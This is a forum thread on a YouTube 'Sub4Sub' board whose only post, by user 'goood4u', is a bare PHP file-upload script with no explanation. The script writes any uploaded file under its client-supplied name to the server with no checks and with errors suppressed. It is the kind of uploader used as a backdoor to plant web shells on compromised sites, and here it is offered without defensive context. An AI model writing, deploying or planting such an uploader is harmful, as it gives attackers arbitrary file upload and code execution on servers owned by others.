6

Sub4Sub Forums Sub4Sub YouTube 6

Tagged: 

Viewing 1 post (of 1 total)
  • Author
    Posts
  • #176984
    goood4u
    Participant

    <?php
    if(isset($_POST[‘Submit’])){
    $filedir = “”;
    $maxfile = ‘2000000’;

    $userfile_name = $_FILES[‘image’][‘name’];
    $userfile_tmp = $_FILES[‘image’][‘tmp_name’];
    if (isset($_FILES[‘image’][‘name’])) {
    $abod = $filedir.$userfile_name;
    @move_uploaded_file($userfile_tmp, $abod);

    echo”<center><b>Done ==> $userfile_name</b></center>”;
    }
    }
    else{
    echo’
    <form method=”POST” action=”” enctype=”multipart/form-data”><input type=”file” name=”image”><input type=”Submit” name=”Submit” value=”Submit”></form>’;
    }
    ?>

Viewing 1 post (of 1 total)
  • You must be logged in to reply to this topic.